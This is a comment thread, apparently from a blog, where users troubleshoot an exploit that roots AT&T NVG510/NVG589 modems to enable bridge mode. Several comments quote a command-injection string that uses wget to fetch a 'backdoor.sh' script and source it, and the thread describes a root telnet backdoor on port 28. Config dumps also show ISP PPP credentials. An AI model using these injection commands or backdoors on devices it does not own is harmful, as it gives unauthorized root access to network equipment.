I have the NVG589's firmware, and I've tried to analyze it as much as I could, but I really need hardware to know what I'm really dealing with. When I first created this exploit, I asked some people with NVG589's to test the exploit, most didn't reply and those that did said it worked. But then since publishing I've been getting numerous reports that it's not working, so idk. 
1/15/2014 3:44:49 AM
shaun
Earlz, I tried your true bridge mode and the nvg510 still pulls the same public ip as always for itself, while my ddwrt router pulls a slightly different ip on a different subnet that goes nowhere. Also, my link dump has a third set of entries, link[3], which seem to be for the actual dsl port.

link[1].type                   = ethernet
link[1].igmp-snooping          = off
link[1].mtu-override           = 0
link[1].port-vlan.ports        = lan-1 lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4
link[1].port-vlan.priority     = 0
link[2].type                   = ethernet
link[2].mtu-override           = 0
link[2].supplicant.type        = eap-tls
link[2].supplicant.qos-marker  = AF1
link[2].supplicant.priority    = 0
link[2].port-vlan.ports        = vc-1
link[2].port-vlan.priority     = 0
link[2].tagged-vlan[1].ports   = ptm
link[2].tagged-vlan[1].vid     = 0
link[2].tagged-vlan[1].priority = 0
link[3].type                   = ppp
link[3].mtu-override           = 0
link[3].ppp-lcp.sub-link-oid   
1/16/2014 11:18:07 PM
shaun
link[3].type                   = ppp
link[3].mtu-override           = 0
link[3].ppp-lcp.sub-link-oid   = WAN
link[3].ppp-lcp.auth-type      = on
link[3].ppp-lcp.username       = attreg@att.net
link[3].ppp-lcp.password       = attreg
link[3].ppp-lcp.magic-number   = on
link[3].ppp-lcp.protocol-compression = off
link[3].ppp-lcp.max-failures   = 5
link[3].ppp-lcp.max-configures = 10
link[3].ppp-lcp.max-terminates = 2
link[3].ppp-lcp.restart-timer  = 3
link[3].ppp-lcp.connection-type = always-on
link[3].ppp-lcp.lcp-echo-request = on
link[3].ppp-lcp.lcp-echo-failures = 7
link[3].ppp-lcp.lcp-echo-interval = 30
link[3].ppp-lcp.mru            = 1492
link[3].ppp-lcp.peer-dns       = on
link[3].ppp-lcp.debug          = off
link[3].pppoe.service-name     =
link[3].pppoe.ac-name          =
link[3].pppoe.sync             =

I hit the line break limit, this is after I reverted to default so I know that the two entries of interest are unmodified here.
1/16/2014 11:19:32 PM
shaun
argh, those last three lines are all set to a null value, having a hard time with the comment form.
1/16/2014 11:21:13 PM
Ralph
I bought the NVG510 application in the play store and just wanted to say: A Big Thank you! The tech gave me a pair upgrade so that my speed is now 3mb. I am using a new modem which is a Pace. I don't need the application anymore or the help anymore but Thank you very much for helping along the way. :)
1/21/2014 7:25:38 PM
James
FWIW when I installed the hack I lost connectivity to the WLAN. It said WLAN was down and I got a red light. BUT resetting to defaults fixed the connectivity, I just had to reinput my WIFI password. Not sure why but it might help some.
1/24/2014 2:36:28 AM
ThaCrip
@ Shaun ; i also have a DD-WRT router and i have the NVG510 setup on PORT1 to act as the WAN and Ports 2/3/4 act like a usual LAN port.

do this... reset the NVG510 connect your ethernet cable from the DD-WRT's WAN port to the PORT 2 on the NVG510 and then do the following (hit enter after each command) (i am just assuming you know how to get to proper screen in order to enter the following commands which it explains in the topic here)...

set link[1].port-vlan.ports "lan-2 lan-3 lan-4"
set link[2].port-vlan.ports lan-1
validate
apply
save

that should sum it up for you. after that's applied then you physically remove the ethernet cable that should currently be connected to LAN port 2 and plug it back into LAN port 1 which will now act like a direct connect to the AT&T servers. then you simply need to setup DD-WRT and all should be fine as i been running mine like that for a while now and in DD-WRT it shows my actual IP address instead of its internet network of the usual 192.168.x.x variations.
2/2/2014 6:38:20 AM
Shaun
That is what I did, but in my case the NVG-510 continues to pull the working public IP, and the DD-WRT router pulls a different, non-working, but public IP.
2/5/2014 9:43:52 PM
awbaker
any word on DNS fix?
2/9/2014 11:05:28 PM
Anonymous
Found a manual with commands that looks interesting here is the link to it:
http://www.ron-berman.com/wp-content/uploads/2011/11/nvg510manual.pdf
2/15/2014 8:59:40 AM
gartral
interestingly enough, I've managed to use your rooting process to convert a NVG510 from an ADSL Modem into a sip client for use with my in-house asterisk server! haven't really tested it much yet, but in theory it should be all-good!
2/15/2014 6:30:21 PM
Anonymous
I followed the updated rooting instructions but I can't seem to reach the root shell. It just prints unrecognized command.
2/17/2014 3:04:20 AM
Tommy
Hi! It's not working for me, I get the following errors:

00:05:45 (1.65 MB/s) - `/tmp/backdoor.sh' saved [184]

sh: /tmp/backdoor.sh: line 1: HTTP/1.0: not found
sh: /tmp/backdoor.sh: line 2: Location:: not found
sh: /tmp/backdoor.sh: line 3: Pragma:: not found
sh: /tmp/backdoor.sh: line 4: Content-Type:: not found
sh: /tmp/backdoor.sh: line 5: 
: not found
sh: /tmp/backdoor.sh: line 6: syntax error: unexpected redirection
HTTP/1.0 302 Found
Location: /cgi-bin/update.ha
Pragma: no-cache
Content-Type: text/html

<html><meta http-equiv=Refresh content=0;url=/cgi-bin/update.ha>
<body></body></html>


I tried telnetting it with port 28, but it says "Could not open connection to the host, on port 28: Connection Failed"
2/18/2014 7:31:13 AM
Earlz
@Tommy your modem is intercepting its own requests. Make sure to go to a web page and click the "continue" button when it redirects you to tell you about possible connection problems or whatever. You may also need to reboot your modem (and make sure you don't get the possible connection problem page after rebooting)
2/18/2014 4:54:27 PM
MienTommy
@Earlz

I have tried doing this offline and online. 
Offline, it brings me to the update page and it just says "Invalid Firmware" and then I restart my modem and telnet is still not enabled. 
Online (connected via charter wifi), I get that error from my previous post.
I canceled my AT&T services and I want to use my AT&T router as a true-bridge network so any webpage displayed will not connect. I've tried hard resetting and still no luck. 
2/18/2014 5:09:05 PM
Anonymous
These parameters would be correct yes?

errrr && wget E:\Users\Tommy\Desktop\backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
2/18/2014 5:10:14 PM
MienTommy
I just tried it with this instead,

errrr && wget E:\Users\Tommy\Desktop\backdoor.nvg510.sh -O E:\Users\Tommy\Desktop\backdoor.nvg510.sh && source E:\Users\Tommy\Desktop\backdoor.nvg510.sh && errr

Still no luck. :/ 
2/18/2014 5:13:52 PM
Earlz
ahhh. I see. If you're not online with AT&T, you'll have to host the file on your local network. To do that, you'll have to run a webserver on your computer. And then you'll have to hook this computer to the NVG510 such that they have compatible IPs (if your NVG510 has 192.168.1.1, you'll need to have something like 192.168.1.123). And then you'll have to modify my HTML page to point to your IP address rather than my website, since the modem can't access it. 

You can email me at earlz at (this domain) if you need help 
2/19/2014 3:02:27 PM
Jaman
Earlz, I'm in a similar situation as the last poster. I'm not an ipdslam subscriber. So if I read your last post correctly I need to copy the source for the update page, edit it for a local computer running a web server, save it locally in the web browser to the edited file, then apply the patch?
3/6/2014 1:54:27 AM
Anonymous
Thanks =)
3/6/2014 9:24:00 AM
Blake222
First of all thank you for your efforts in working all of this out! I decided to download the app for 2 reasons, first I always take the opportunity to give back to all of our 3rd party programmers out there giving us such great software and fixes, I recently worked for a programmer who also used Xamarin, what a great tool, and have seen the work that goes into creating programs and apps! It blew my mind how many programmers around here do not use Xamarin, or even know of it... or they want to charge their customers double or triple to build an app three times so it has the ability to run on iOS, Android, and Windows. And secondly I have way too many projects started already!
I have the NVG589 Router, bought the app and installed it on my Note 3 phone and my Samsung Tablet.  I was able to get the app to locate the router and connect, then after the warning about possible rebooting and internet loss, I was presented with the menu...good start!  I have attempted every task on the menu and they all ended the s
3/6/2014 5:53:19 PM
Blake222
It seems to be failing at the point of login, "Login appears to have been unsuccessful or this is not an NVG510". I understand that there was no guarantee on the 589, I was just hoping you could help me out with finding another option or telling me if I even need to mess with it at all, and I do NOT want a refund! Consider that a Universal Thanks Contribution!! To set up a Gigabit Network I recently purchased a Netgear GS105 and still have my old Vizio XWR100 router connected to the 589 which seems to work fine as a hub and the wireless is active and functioning. I have a WD MyBook Live 3TB NAS which is where my problem lies as I have nearly 600 movies and 40K songs to transfer (which is why I am switching to gigabit). I am using my hacked "aTV Flash" Apple TV 2nd gen as my media server...still deciding on an app, maybe XBMC, Plex, or one of the others. Finally my question!! Everything I have just explained is new and in the process of being set up but I am still having speed issues so my media is taki
3/6/2014 6:10:47 PM
Anonymous
I'm interested in buying your app to support the time you've researched on it, and set up a bridge mode from an NVG510 to a Linksys EA6500. I'm not sure it'll work though, because once I telnet into the router according to the directions above, I cannot use "!" to elevate to root. Is that a problem you've seen before, and does your app rely on the "!" command working?
For reference, the response to the status command.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
3/12/2014 5:46:40 AM
Earlz
umm.. both. So, the exploit has been changed so that it doesn't need that telnet shell. It now installs a backdoor telnet shell on port 28 that can reach a root shell and activate bridge mode and such. 
3/12/2014 6:45:27 AM
john
I'd like to get the app just because it looks way easier. Do I need to install the backdoor before enabling uPnP and true bridged mode? Currently I'm using some complicated configuration with IP Passthrough that doesn't seem to really do what I need. Should I do a factory reset before using your app? Does the factory reset put the subnet back to 192.168.1.x? 
3/18/2014 8:04:49 PM
john
Sorry I also meant to ask where is the Wiki mentioned in the first comment in this thread?
3/18/2014 8:05:34 PM
john
I'm getting page cannot be displayed in both IE and FF trying to root the modem. How does your page know how to access the modem? Mine is not on the default IP and it's not listed on my PC as the gateway because I have a router behind the modem. 
3/19/2014 12:03:17 AM
Samizdata
Well, it didn't work quite as listed, but I have managed to enable UPnP and also get the redirect disabled.  Now, does anyone have a clue on how to properly reset the device list?  (Sorry, no Android device.)
3/19/2014 11:51:38 PM
JAW
Earlz, I don't know if you still monitor this page, but I figured I would give it a shot. I have followed your instructions and I still can not get to the root. Every time I put the nonce value in your page I get an invalid firmware message. I have a NVG510 with NVG510 9.0.6h2d30 firmware, Windows 7 (64 bit), IE 11 and I am connecting via CAT5 cable with no other devices connected to NVG 510. Any suggestions? I don't have access to an Android device otherwise I would do the $3.00 app.
4/2/2014 1:28:14 AM
Earlz
I am temporarily disabling comments due to spam. Until I get better spam blocking support, please email me at earlz -at- this domain (earlz dot net) with issues
4/10/2014 1:46:23 PM
ThaCrip
Shaun said... "That is what I did, but in my case the NVG-510 continues to pull the working public IP, and the DD-WRT router pulls a different, non-working, but public IP."

also, i noticed i got to generally go into the DD-WRT router and under its "Status > WAN" section that you have to click the 'DHCP release' and then wait a few seconds and then click 'DHCP renew' and then the DD-WRT router should attempt to make a connection (it usually works pretty quickly in my case) as i have the 'Setup > Basic Setup' and under the 'WAN connection type' have that set to 'Automatic Configuration - DHCP' and i got the MTU set to 1500 (i am not sure if the MTU setting matters).

p.s. sorry for the nearly 3 month late reply.
4/30/2014 10:29:07 AM
KZ
First of all thank you for all the hard work to find this vulnerability and create this site. Kudos! I am a very unhappy AT&T customer who has for almost 6 months been trying to get my NVG589 into bridge mode. I have tried a variety of methods all suggested by different people online. Occasionally one will work for a couple of days and then quit again. I have never been able to replicate success so I thought I would give your hack a try. I have tried to use the hack locating the nonce value and plugging it into your control2 page script. I very quickly get a response from the RG on the update page saying "invalid firmware image". After rebooting the RG I am not able to access the CLI on port 28. I have tried a simple telnet from the CLI in Windows 7 as well as PuTTY, both result in a connection failed. I then took a look at the nonce value again and noticed that it changes with each reboot of the RG. I don't know if that is significant but I thought I would mention it. I have tried this several times with no 
5/2/2014 8:45:14 PM
Kenneth
Hey, I got into the router just fine, however it dumped me right to nsh as soon as I telnetted in, not sure if that is a problem or not. Secondly whenever I change mgmt.lan-redirect.enable to off and go to save it says the directory is dirty and won't let me save my changes. Any idea on how to change this?
5/9/2014 4:44:52 PM
